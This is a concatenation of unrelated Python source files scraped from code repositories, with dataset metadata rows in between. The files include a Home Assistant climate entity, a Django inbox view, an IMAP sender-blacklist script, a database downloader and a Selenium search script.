def min_temp(self):
"""Return the polling state."""
return self._min_temp
@property
def max_temp(self):
"""Return the polling state."""
return self._max_temp
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target_temperature
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return self._target_temperature_step
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return self._current_operation
@property
def operation_list(self):
"""Return the list of available operation modes."""
return self._operation_list
@property
def swing_list(self):
"""Return the list of available swing modes."""
return self._swing_list
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self._current_fan_mode
@property
def current_swing_mode(self):
"""Return current swing mode."""
return self._current_swing_mode
@property
def fan_list(self):
"""Return the list of available fan modes."""
return self._fan_list
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
def set_temperature(self, **kwargs):
"""Set new target temperatures."""
if kwargs.get(ATTR_TEMPERATURE) is not None:
self._target_temperature = kwargs.get(ATTR_TEMPERATURE)
if not (self._current_operation.lower() == 'off' or self._current_operation.lower() == 'idle'):
self.send_command()
elif self._default_operation_from_idle is not None:
self.set_operation_mode(self._default_operation_from_idle)
self.schedule_update_ha_state()
def set_fan_mode(self, fan):
"""Set new target temperature."""
self._current_fan_mode = fan
if not (self._current_operation.lower() == 'off' or self._current_operation.lower() == 'idle'):
self.send_command()
self.schedule_update_ha_state()
def set_operation_mode(self, operation_mode):
"""Set new target temperature."""
self._current_operation = operation_mode
self.send_command()
self.schedule_update_ha_state()
def set_swing_mode(self, swing_mode):
"""Set new target swing operation."""
self._current_swing_mode = swing_mode
self.send_command()
self.schedule_update_ha_state()
@asyncio.coroutine
def async_added_to_hass(self):
state = yield from RestoreEntity(self.hass, self.entity_id)
if state is not None:
self._target_temperature = state.attributes['temperature']
self._current_operation = state.attributes['operation_mode']
self._current_fan_mode = state.attributes['fan_mode']
self._current_swing_mode = state.attributes['swing_mode']
| 34.404011
| 228
| 0.68077
| 1,500
| 12,007
| 5.082
| 0.132
| 0.022039
| 0.02217
| 0.034632
| 0.279942
| 0.206874
| 0.155844
| 0.101666
| 0.07884
| 0.072544
| 0
| 0.004437
| 0.230366
| 12,007
| 348
| 229
| 34.502874
| 0.820474
| 0.065795
| 0
| 0.143969
| 0
| 0
| 0.056301
| 0.002432
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105058
| false
| 0
| 0.058366
| 0
| 0.237354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c0d77712915106228bf8f6e63542f7a42d1d3f1
| 1,602
|
py
|
Python
|
config.py
|
jasonyanglu/fedavgpy
|
cefbe5854f02d3df1197d849872286439c86e949
|
[
"MIT"
] | 1
|
2022-03-18T15:27:29.000Z
|
2022-03-18T15:27:29.000Z
|
config.py
|
jasonyanglu/fedavgpy
|
cefbe5854f02d3df1197d849872286439c86e949
|
[
"MIT"
] | null | null | null |
config.py
|
jasonyanglu/fedavgpy
|
cefbe5854f02d3df1197d849872286439c86e949
|
[
"MIT"
] | null | null | null |
# GLOBAL PARAMETERS
DATASETS = ['sent140', 'nist', 'shakespeare',
'mnist', 'synthetic', 'cifar10']
TRAINERS = {'fedavg': 'FedAvgTrainer',
'fedavg4': 'FedAvg4Trainer',
'fedavg5': 'FedAvg5Trainer',
'fedavg9': 'FedAvg9Trainer',
'fedavg_imba': 'FedAvgTrainerImba',}
OPTIMIZERS = TRAINERS.keys()
class ModelConfig(object):
def __init__(self):
pass
def __call__(self, dataset, model):
dataset = dataset.split('_')[0]
if dataset == 'mnist' or dataset == 'nist':
if model == 'logistic' or model == '2nn':
return {'input_shape': 784, 'num_class': 10}
else:
return {'input_shape': (1, 28, 28), 'num_class': 10}
elif dataset == 'cifar10':
return {'input_shape': (3, 32, 32), 'num_class': 10}
elif dataset == 'sent140':
sent140 = {'bag_dnn': {'num_class': 2},
'stacked_lstm': {'seq_len': 25, 'num_class': 2, 'num_hidden': 100},
'stacked_lstm_no_embeddings': {'seq_len': 25, 'num_class': 2, 'num_hidden': 100}
}
return sent140[model]
elif dataset == 'shakespeare':
shakespeare = {'stacked_lstm': {'seq_len': 80, 'emb_dim': 80, 'num_hidden': 256}
}
return shakespeare[model]
elif dataset == 'synthetic':
return {'input_shape': 60, 'num_class': 10}
else:
raise ValueError('Not support dataset {}!'.format(dataset))
MODEL_PARAMS = ModelConfig()
| 38.142857
| 103
| 0.529963
| 156
| 1,602
| 5.217949
| 0.467949
| 0.068796
| 0.078624
| 0.034398
| 0.12285
| 0.071253
| 0.071253
| 0.071253
| 0.071253
| 0
| 0
| 0.061412
| 0.318976
| 1,602
| 41
| 104
| 39.073171
| 0.684693
| 0.010612
| 0
| 0.057143
| 0
| 0
| 0.286166
| 0.016425
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0.028571
| 0
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c10cbd008220b779ffa61252edc4ab7bdc901a1
| 5,506
|
py
|
Python
|
server/inbox/views.py
|
amy-xiang/CMPUT404_PROJECT
|
cbcea0cd164d6377ede397e934f960505e8f347a
|
[
"W3C-20150513"
] | 1
|
2021-04-06T22:35:53.000Z
|
2021-04-06T22:35:53.000Z
|
server/inbox/views.py
|
amy-xiang/CMPUT404_PROJECT
|
cbcea0cd164d6377ede397e934f960505e8f347a
|
[
"W3C-20150513"
] | null | null | null |
server/inbox/views.py
|
amy-xiang/CMPUT404_PROJECT
|
cbcea0cd164d6377ede397e934f960505e8f347a
|
[
"W3C-20150513"
] | null | null | null |
from django.core.exceptions import ValidationError
from django.shortcuts import render, get_object_or_404
from django.db import IntegrityError
from rest_framework import authentication, generics, permissions, status
from rest_framework.exceptions import PermissionDenied
from rest_framework.response import Response
from posts.serializers import PostSerializer
from author.serializers import AuthorProfileSerializer
from main.models import Author
from nodes.models import Node
from main import utils
from posts.models import Post
from likes.models import Like
from .models import Inbox
from .serializers import InboxSerializer
from urllib.parse import urlparse
import requests
import json
# api/author/{AUTHOR_ID}/inbox/
class InboxView(generics.RetrieveUpdateDestroyAPIView):
serializer_class = InboxSerializer
authenticate_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
def get_inbox(self):
request_author_id = self.kwargs['author_id']
if self.request.user.id != request_author_id:
raise PermissionDenied(
detail={'error': ['You do not have permission to this inbox.']})
if not self.request.user.adminApproval:
raise PermissionDenied(
detail={'error': ['User has not been approved by admin.']})
return get_object_or_404(Inbox, author=Author.objects
.get(id=self.request.user.id))
# GET: get Inbox of an user
def get(self, request, *args, **kwargs):
inbox = self.get_inbox()
serializer = InboxSerializer(inbox, context={'request': request})
return Response(serializer.data)
# POST: send a Post, Like or Follow to Inbox
def post(self, request, *args, **kwargs):
request_author_id = self.kwargs['author_id']
inbox_type = request.data.get('type')
if inbox_type is not None: inbox_type = inbox_type.lower()
host_name = request.get_host()
if inbox_type == 'post':
post_id = request.data.get('id')
try:
Inbox.objects.get(author=request_author_id).send_to_inbox(request.data)
except Inbox.DoesNotExist as e:
return Response({'error':'Author not found! Please check author_id in URL.'},
status=status.HTTP_404_NOT_FOUND)
return Response({'data':f'Shared Post {post_id} with Author '
f'{request_author_id} on {host_name}.'},
status=status.HTTP_200_OK)
elif inbox_type == 'like':
id_url = request.data.get('object')
parsed_uri = urlparse(id_url)
object_host = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)
# Sending a LIKE from (us or remote server) to us
if (object_host == utils.HOST):
try:
Inbox.objects.get(author=request_author_id).send_to_inbox(request.data)
except Inbox.DoesNotExist as e:
return Response({'error':'Author not found! Please check author_id in URL.'},
status=status.HTTP_404_NOT_FOUND)
# Sending a LIKE from us to remote server
else:
try:
remote_server = Node.objects.get(remote_server_url=object_host)
except Node.DoesNotExist:
return Response({'error':'Could not find remote server user'}, status=status.HTTP_404_NOT_FOUND)
r = requests.post(
f"{object_host}api/author/{request_author_id}/inbox/",
json=request.data,
auth=(remote_server.konnection_username, remote_server.konnection_password))
if r.status_code < 200 or r.status_code >= 300:
return Response({'error':'Could not complete the request to the remote server'},
status=r.status_code)
# Gather information for the Like object creation
try:
object_type = Like.LIKE_COMMENT if ('comments' in id_url) else Like.LIKE_POST
if (id_url.endswith('/')):
object_id = id_url.split('/')[-2]
else:
object_id = id_url.split('/')[-1]
like_author_id = request.data.get('author')['id'].split('/')[-1]
Like.objects.create(
author=request.data.get('author'), author_id=like_author_id,
object=id_url, object_type=object_type, object_id=object_id
)
except IntegrityError:
return Response({'data':f'You have already sent a like to {object_type} {id_url} on {host_name}.'},
status=status.HTTP_200_OK)
return Response({'data':f'Sent like to {object_type} {id_url} on {host_name}.'},
status=status.HTTP_200_OK)
else:
return Response({'error':'Invalid type, only \'post\', \'like\''},
status=status.HTTP_400_BAD_REQUEST)
# DELETE: Clear the inbox
def delete(self, request, *args, **kwargs):
inbox = self.get_inbox()
length = len(inbox.items)
inbox.items.clear()
inbox.save()
return Response({'data':f'Deleted {length} messages.'}, status=status.HTTP_200_OK)
| 44.403226
| 116
| 0.606793
| 643
| 5,506
| 5.021773
| 0.239502
| 0.039641
| 0.039641
| 0.023537
| 0.245587
| 0.200062
| 0.1917
| 0.17126
| 0.138123
| 0.138123
| 0
| 0.01007
| 0.296586
| 5,506
| 123
| 117
| 44.764228
| 0.823651
| 0.046858
| 0
| 0.244898
| 0
| 0
| 0.132824
| 0.014886
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0.010204
| 0.183673
| 0
| 0.377551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c119513513dbce82555731b084d2de00dc48dc8
| 1,873
|
py
|
Python
|
black_list_all.py
|
philipempl/mail_watch
|
802df3146c462aeb670a4a973e428976d90abf06
|
[
"Apache-2.0"
] | null | null | null |
black_list_all.py
|
philipempl/mail_watch
|
802df3146c462aeb670a4a973e428976d90abf06
|
[
"Apache-2.0"
] | 1
|
2019-12-11T08:49:51.000Z
|
2019-12-11T08:49:51.000Z
|
black_list_all.py
|
philipempl/mail_watch
|
802df3146c462aeb670a4a973e428976d90abf06
|
[
"Apache-2.0"
] | null | null | null |
import imaplib, base64, os, email, re, configparser
import tkinter as tk
from tkinter import messagebox
from datetime import datetime
from email import generator
from dateutil.parser import parse
def init():
mail = imaplib.IMAP4_SSL(config['SERVER']['Host'],config['SERVER']['Port'])
pwd = str(input("PWD: "))
print(pwd)
mail.login(str(config['ADDRESS']['Email']),pwd )
for dir in config['MAIL_DIRS']:
dir = config['MAIL_DIRS'][dir]
print('\n ########################## ' + dir + ' ##################################\n')
mail.select(dir)
type, data = mail.search(None, 'ALL')
mail_ids = data[0]
id_list = mail_ids.split()
readAllMails(id_list, mail)
def readAllMails(id_list, mail):
counter = 0
l = len(id_list)
for num in id_list:
typ, data = mail.fetch(num, '(RFC822)' )
raw_email = data[0][1]
# converts byte literal to string removing b''
try:
raw_email_string = raw_email.decode('utf-8')
email_message = email.message_from_string(raw_email_string)
# get sender from mail
except:
continue
sender_name = ''
sender_email = ''
sender_array = email_message['from'].split('<')
if(len(sender_array) > 1):
sender_email = (sender_array[1][:-1]).lower()
sender_name = re.sub(r"[^a-zA-Z0-9]+", ' ',sender_array[0]).strip()
else:
sender_email = (sender_array[0]).lower()
counter = counter + 1
printProgressBar(counter, l, prefix = 'Progress:', suffix = 'Complete', length = 50)
if(isInBlackList(sender_email) == False):
addToBlackList(sender_email)
def isInBlackList(sender):
with open(black_list) as blackList:
if sender in blackList.read():
return True
else:
return False
def addToBlackList(sender):
hs = open("blackList.txt","a")
hs.write(sender + "\n")
hs.close()
init()
| 28.378788
| 99
| 0.620929
| 244
| 1,873
| 4.631148
| 0.438525
| 0.026549
| 0.026549
| 0.058407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014122
| 0.206086
| 1,873
| 66
| 100
| 28.378788
| 0.745797
| 0.034704
| 0
| 0.037736
| 0
| 0
| 0.109635
| 0.03433
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075472
| false
| 0
| 0.113208
| 0
| 0.226415
| 0.056604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c129d467e7a619b95bbc8aa752a9a6e384e5ae6
| 4,075
|
py
|
Python
|
iraclis/_1databases.py
|
nespinoza/Iraclis
|
3b5dd8d6bc073f6d2c24ad14341020694255bf65
|
[
"CC-BY-4.0"
] | null | null | null |
iraclis/_1databases.py
|
nespinoza/Iraclis
|
3b5dd8d6bc073f6d2c24ad14341020694255bf65
|
[
"CC-BY-4.0"
] | null | null | null |
iraclis/_1databases.py
|
nespinoza/Iraclis
|
3b5dd8d6bc073f6d2c24ad14341020694255bf65
|
[
"CC-BY-4.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ._0errors import *
from ._0imports import *
class Database:
def __init__(self, database_name, vital=False, date_to_update='daily', force_update=False, ask_size=None):
package_name = 'iraclis'
info_file_name = '_0database.pickle'
directory_name = 'database'
last_update_file_name = 'database_last_update.txt'
info_file_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), info_file_name)
package_path = os.path.join(os.path.expanduser('~'), '.{0}'.format(package_name))
if not os.path.isdir(package_path):
os.mkdir(package_path)
directory_path = os.path.join(package_path, '{0}_{1}'.format(database_name, directory_name))
last_update_file_path = os.path.join(package_path, '{0}_{1}'.format(database_name, last_update_file_name))
if date_to_update == 'daily':
date_to_update = int(time.strftime('%y%m%d'))
else:
date_to_update = int(date_to_update)
if os.path.isdir(directory_path):
if force_update or len(glob.glob(os.path.join(directory_path, '*'))) == 0:
shutil.rmtree(directory_path)
os.mkdir(directory_path)
update = True
else:
if not os.path.isfile(last_update_file_path):
update = True
elif int(open(last_update_file_path).readlines()[0]) < date_to_update:
update = True
else:
update = False
else:
os.mkdir(directory_path)
update = True
if update and ask_size:
if input('Downloading {0} database (up to {1})... proceed with download now? (y/n): '.format(
database_name, ask_size)) == 'y':
update = True
else:
update = False
if update:
# noinspection PyBroadException
try:
print('\nDownloading {0} database...'.format(database_name))
dbx_files = pickle.load(open(info_file_path, 'rb'))
dbx_files = dbx_files['{0}_{1}'.format(database_name, directory_name)]
for i in glob.glob(os.path.join(directory_path, '*')):
if os.path.split(i)[1] not in dbx_files:
os.remove(i)
for i in dbx_files:
if not os.path.isfile(os.path.join(package_path, dbx_files[i]['local_path'])):
print(i)
urlretrieve(dbx_files[i]['link'], os.path.join(package_path, dbx_files[i]['local_path']))
if database_name == 'clablimb':
xx = pickle.load(open(glob.glob(os.path.join(directory_path, '*'))[0], 'rb'))
for i in xx:
w = open(os.path.join(directory_path, i), 'w')
w.write(xx[i])
w.close()
w = open(last_update_file_path, 'w')
w.write(time.strftime('%y%m%d'))
w.close()
except Exception as inst:
print('\nDownloading {0} database failed. A download will be attempted next time.'.format(
database_name))
print('Error:', sys.exc_info()[0])
print(inst.args)
pass
if (not os.path.isdir(directory_path) or
len(glob.glob(os.path.join(directory_path, '*'))) == 0):
if vital:
raise IraclisLibraryError('{0} database not available.'.format(database_name))
else:
print('\n{0} features cannot be used.'.format(database_name))
self.path = False
else:
self.path = directory_path
class Databases:
def __init__(self):
self.wfc3 = Database('wfc3', vital=True, date_to_update='181212').path
databases = Databases()
| 38.084112
| 114
| 0.553374
| 484
| 4,075
| 4.402893
| 0.243802
| 0.056312
| 0.051619
| 0.04458
| 0.332708
| 0.211638
| 0.164711
| 0.128578
| 0.113562
| 0.113562
| 0
| 0.010985
| 0.329816
| 4,075
| 106
| 115
| 38.443396
| 0.769315
| 0.007117
| 0
| 0.219512
| 0
| 0.012195
| 0.09817
| 0.005935
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0.012195
| 0.060976
| 0
| 0.109756
| 0.085366
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c134e04d61928fa6fcc6871ade77a7efb97baf0
| 1,029
|
py
|
Python
|
Level2/Ex_5.py
|
zac11/Python_Excerices
|
775739e2639be1f82cc3690c854b9ea0ece05042
|
[
"Apache-2.0"
] | 2
|
2019-03-09T20:31:06.000Z
|
2020-06-19T12:15:13.000Z
|
Level2/Ex_5.py
|
zac11/Python_Excerices
|
775739e2639be1f82cc3690c854b9ea0ece05042
|
[
"Apache-2.0"
] | null | null | null |
Level2/Ex_5.py
|
zac11/Python_Excerices
|
775739e2639be1f82cc3690c854b9ea0ece05042
|
[
"Apache-2.0"
] | 1
|
2018-08-11T18:36:49.000Z
|
2018-08-11T18:36:49.000Z
|
"""
Write a program that accepts a sequence of whitespace separated words as input and prints the words after removing all
duplicate words and sorting them alphanumerically.
Suppose the following input is supplied to the program:
hello world and practice makes perfect and hello world again
Then, the output should be:
again and hello makes perfect practice world
"""
string_input = input()
words =[word for word in string_input.split(" ")]
print(" ".join(sorted(list(set(words)))))
"""
Let's break it down now
print(set(words))
This will print a set of the words, with all the unique values
print(list(set(words)))
Create a list out of the values of words
print(sorted(list(set(words))))
This will sort the list
print(" ".join(sorted(list(set(words)))))
This is join the sorted list items with a whitespace
For this input :
I like to yawn and I also like to make a music and a car
Now output will be :
I a also and car like make music to yawn
Notice that the uppercase I is sorted at first position
"""
| 19.415094
| 118
| 0.74344
| 177
| 1,029
| 4.310734
| 0.418079
| 0.052425
| 0.06291
| 0.070773
| 0.104849
| 0.070773
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183673
| 1,029
| 52
| 119
| 19.788462
| 0.908333
| 0.348882
| 0
| 0
| 0
| 0
| 0.016667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1675a2a9274be019b322c8830f740dbd48fb14
| 6,063
|
py
|
Python
|
alfworld/agents/utils/traj_process.py
|
roy860328/VSGM
|
3ec19f9cf1401cecf45527687936b8fe4167f672
|
[
"MIT"
] | 6
|
2021-05-22T15:33:42.000Z
|
2022-01-12T03:34:39.000Z
|
alfworld/agents/utils/traj_process.py
|
roy860328/VSGM
|
3ec19f9cf1401cecf45527687936b8fe4167f672
|
[
"MIT"
] | 1
|
2021-06-19T10:04:13.000Z
|
2021-06-20T03:37:23.000Z
|
alfworld/agents/utils/traj_process.py
|
roy860328/VSGM
|
3ec19f9cf1401cecf45527687936b8fe4167f672
|
[
"MIT"
] | null | null | null |
import os
import cv2
import json
import numpy as np
import h5py
from PIL import Image
TASK_TYPES = {1: "pick_and_place_simple",
2: "look_at_obj_in_light",
3: "pick_clean_then_place_in_recep",
4: "pick_heat_then_place_in_recep",
5: "pick_cool_then_place_in_recep",
6: "pick_two_obj_and_place"}
def save_trajectory(envs, store_states, task_desc_strings, expert_actions, still_running_masks):
print("=== SAVE BATCH ===")
TRAIN_DATA = "TRAIN_DATA.json"
for i, thor in enumerate(envs):
save_data_path = thor.env.save_frames_path
print("=== save one episode len ===", len(expert_actions))
print("=== save path ===", save_data_path)
data = {
"task_desc_string": [],
"expert_action": [],
"sgg_meta_data": [],
"rgb_image": [],
}
img_name = 0
for store_state, task_desc_string, expert_action, still_running_mask in \
zip(store_states, task_desc_strings, expert_actions, still_running_masks):
if int(still_running_mask[i]) == 0:
break
_task_desc_string = task_desc_string[i]
_expert_action = expert_action[i]
rgb_image = store_state[i]["rgb_image"]
img_path = os.path.join(save_data_path, '%09d.png' % img_name)
cv2.imwrite(img_path, rgb_image)
data["task_desc_string"].append(_task_desc_string)
data["expert_action"].append(_expert_action)
data["rgb_image"].append(img_path)
data["sgg_meta_data"].append(store_state[i]["sgg_meta_data"])
img_name += 1
with open(os.path.join(save_data_path, TRAIN_DATA), 'w') as f:
json.dump(data, f)
def save_exploration_trajectory(envs, exploration_frames, sgg_meta_datas):
print("=== SAVE EXPLORATION BATCH ===")
TRAIN_DATA = "TRAIN_DATA.json"
for i, thor in enumerate(envs):
save_data_path = thor.env.save_frames_path
print("=== save exploration one episode len ===", len(sgg_meta_datas[i]))
print("=== save exploration path ===", save_data_path)
data = {
"exploration_img": [],
"exploration_sgg_meta_data": [],
}
img_name = 0
for exploration_frame, sgg_meta_data, in zip(exploration_frames[i], sgg_meta_datas[i]):
img_path = os.path.join(save_data_path, 'exploration_img%09d.png' % img_name)
cv2.imwrite(img_path, exploration_frame)
data["exploration_img"].append(img_path)
data["exploration_sgg_meta_data"].append(sgg_meta_data)
img_name += 1
with open(os.path.join(save_data_path, TRAIN_DATA), 'r') as f:
ori_data = json.load(f)
with open(os.path.join(save_data_path, TRAIN_DATA), 'w') as f:
data = {**ori_data, **data}
json.dump(data, f)
def get_traj_train_data(tasks_paths, save_frames_path):
# [store_states, task_desc_strings, expert_actions]
transition_caches = []
for task_path in tasks_paths:
transition_cache = [None, None, None]
traj_root = os.path.dirname(task_path)
task_path = os.path.join(save_frames_path, traj_root.replace('../', ''))
with open(task_path + '/TRAIN_DATA.json', 'r') as f:
data = json.load(f)
# store store_states
store_states = []
rgb_array = load_img_with_h5(data["rgb_image"], task_path)
for img, sgg_meta_data in zip(rgb_array, data["sgg_meta_data"]):
store_state = {
"rgb_image": img,
"sgg_meta_data": sgg_meta_data,
}
store_states.append(store_state)
# len(store_state) == 39
transition_cache[0] = store_states
# len(seq_task_desc_strings) == 39
transition_cache[1] = [[task_desc_string] for task_desc_string in data["task_desc_string"]]
# len(seq_target_strings) == 39
transition_cache[2] = [[expert_action] for expert_action in data["expert_action"]]
transition_caches.append(transition_cache)
# import pdb; pdb.set_trace()
return transition_caches
def get_exploration_traj_train_data(tasks_paths, save_frames_path):
# [store_states, task_desc_strings, expert_actions]
exploration_transition_caches = []
for task_path in tasks_paths:
transition_cache = [None, None, None]
traj_root = os.path.dirname(task_path)
task_path = os.path.join(save_frames_path, traj_root.replace('../', ''))
with open(task_path + '/TRAIN_DATA.json', 'r') as f:
data = json.load(f)
# store store_states
store_states = []
rgb_array = load_img_with_h5(data["exploration_img"], task_path, pt_name="exploration_img.pt")
for img, sgg_meta_data in zip(rgb_array, data["exploration_sgg_meta_data"]):
store_state = {
"exploration_img": img,
"exploration_sgg_meta_data": sgg_meta_data,
}
store_states.append(store_state)
# len(store_state) == 39
transition_cache[0] = store_states
exploration_transition_caches.append(transition_cache)
# import pdb; pdb.set_trace()
return exploration_transition_caches
def load_img_with_h5(rgb_img_names, img_dir_path, pt_name="img.pt"):
img_h5 = os.path.join(img_dir_path, pt_name)
if not os.path.isfile(img_h5):
rgb_array = []
for rgb_img_name in rgb_img_names:
rgb_img_name = rgb_img_name.rsplit("/", 1)[-1]
rgb_img_path = os.path.join(img_dir_path, rgb_img_name)
rgb_img = Image.open(rgb_img_path).convert("RGB")
rgb_img = np.array(rgb_img)
rgb_array.append(rgb_img)
hf = h5py.File(img_h5, 'w')
hf.create_dataset('rgb_array', data=rgb_array)
hf.close()
print("Save img data to {}".format(img_h5))
hf = h5py.File(img_h5, 'r')
rgb_array = hf['rgb_array'][:]
return rgb_array
| 41.527397
| 102
| 0.628072
| 820
| 6,063
| 4.257317
| 0.152439
| 0.036093
| 0.047264
| 0.028072
| 0.567459
| 0.465483
| 0.454025
| 0.454025
| 0.420223
| 0.420223
| 0
| 0.009547
| 0.257133
| 6,063
| 145
| 103
| 41.813793
| 0.765542
| 0.04981
| 0
| 0.295082
| 0
| 0
| 0.146261
| 0.044174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040984
| false
| 0
| 0.04918
| 0
| 0.114754
| 0.057377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1927e4c80951e764d207f99cb77de8d5e6eb00
| 1,850
|
py
|
Python
|
selenium-browser.py
|
steflayanto/international-google-search
|
05cc773b158fe11202fdf39fb515b398a08b7e3c
|
[
"MIT"
] | null | null | null |
selenium-browser.py
|
steflayanto/international-google-search
|
05cc773b158fe11202fdf39fb515b398a08b7e3c
|
[
"MIT"
] | null | null | null |
selenium-browser.py
|
steflayanto/international-google-search
|
05cc773b158fe11202fdf39fb515b398a08b7e3c
|
[
"MIT"
] | null | null | null |
import os, time, pyautogui
import selenium
from selenium import webdriver
from location_reference import country_map
# STATIC SETTINGS
DPI = 125 # Scaling factor of texts and apps in display settings
screen_dims = [x / (DPI/100) for x in pyautogui.size()]
code_map = country_map()
print("International Google Search")
print("Supported Countries: USA, UK, Japan, Canada, Germany, Italy, France, Australia, Brasil, India, Korea, Pakistan")
query = input("Please input Search Query: ")
text = " "
codes = []
while text is not "" and len(codes) != 3:
text = input("Input Country. Input nothing to start search: ").lower()
if text not in code_map.keys():
print("\tERROR: Country not recognized")
continue
codes.append(code_map[text])
print("Starting Search")
# Using Chrome Incognito to access web
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--incognito")
drivers = []
for i in range(3):
drivers.append(webdriver.Chrome(chrome_options=chrome_options))
drivers[i].set_window_position(i * screen_dims[0] / 3, 0)
assert len(codes) == len(drivers)
for i, driver in enumerate(drivers):
# Open the website
code = codes[i]
driver.get('https://www.google.com/ncr')
time.sleep(0.5)
driver.get('https://www.google.com/?gl=' + code)
# print(screen_dims)
# print(driver.get_window_size())
driver.set_window_size(screen_dims[0] / 3, screen_dims[1])
# print(driver.get_window_size())
element = driver.find_element_by_name("q")
element.send_keys(query)
element.submit()
# for i in range(3):
# drivers[i].set_window_position(i * screen_dims[0] / 3, 0)
# driver.manage().window().setPosition(0,0)
# Get Search Box
# element = driver.find_element_by_name("q")
# element.send_keys("Hotels")
# element.submit()
input("Press enter to exit")
| 28.90625
| 120
| 0.702162
| 265
| 1,850
| 4.769811
| 0.430189
| 0.047468
| 0.026108
| 0.028481
| 0.238133
| 0.200158
| 0.134494
| 0.134494
| 0.134494
| 0.134494
| 0
| 0.014221
| 0.163784
| 1,850
| 64
| 121
| 28.90625
| 0.802844
| 0.232973
| 0
| 0
| 0
| 0.027778
| 0.243416
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1d0a50a97a1bf750da3e79140c45303971c672
| 2,027
|
py
|
Python
|
registration/admin.py
|
allenallen/interedregistration
|
d6b93bfc33d7bb9bfbabdcdb27b685f3a6be3ea9
|
[
"MIT"
] | null | null | null |
registration/admin.py
|
allenallen/interedregistration
|
d6b93bfc33d7bb9bfbabdcdb27b685f3a6be3ea9
|
[
"MIT"
] | 6
|
2020-02-11T23:05:13.000Z
|
2021-06-10T20:43:51.000Z
|
registration/admin.py
|
allenallen/interedregistration
|
d6b93bfc33d7bb9bfbabdcdb27b685f3a6be3ea9
|
[
"MIT"
] | null | null | null |
import csv
from django.contrib import admin
from django.http import HttpResponse
from .models import Student, SchoolList, Event, ShsTrack, SchoolOfficial
class ExportCsvMixin:
def export_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
row = writer.writerow([getattr(obj, field) for field in field_names])
return response
export_as_csv.short_description = "Export Selected"
@admin.register(SchoolOfficial)
class SchoolOfficialAdmin(admin.ModelAdmin, ExportCsvMixin):
list_display = (
'id', 'last_name', 'first_name', 'school', 'designation', 'course_taken', 'email', 'date_of_birth', 'mobile',
'gender', 'date_registered', 'registered_event')
list_filter = ('registered_event', 'school',)
actions = ['export_as_csv']
@admin.register(Student)
class StudentAdmin(admin.ModelAdmin, ExportCsvMixin):
list_display = (
